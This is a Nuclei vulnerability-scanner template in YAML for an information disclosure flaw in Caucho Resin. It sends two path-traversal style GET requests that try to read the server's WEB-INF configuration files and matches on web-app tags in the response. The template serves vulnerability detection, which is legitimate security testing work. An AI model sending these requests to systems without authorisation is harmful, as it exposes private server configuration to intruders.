nuclei-templates/http/vulnerabilities/other/caucho-resin-info-disclosur...

38 lines
1.1 KiB
YAML

id: caucho-resin-info-disclosure
info:
name: Caucho Resin - Information Disclosure
author: pikpikcu
severity: info
description: Caucho Resin contains an information disclosure vulnerability. The application does not properly sanitize user-supplied input. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/27888
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: exposure,resin,caucho,edb
metadata:
max-request: 2
http:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200
# Enhanced by md on 2023/03/23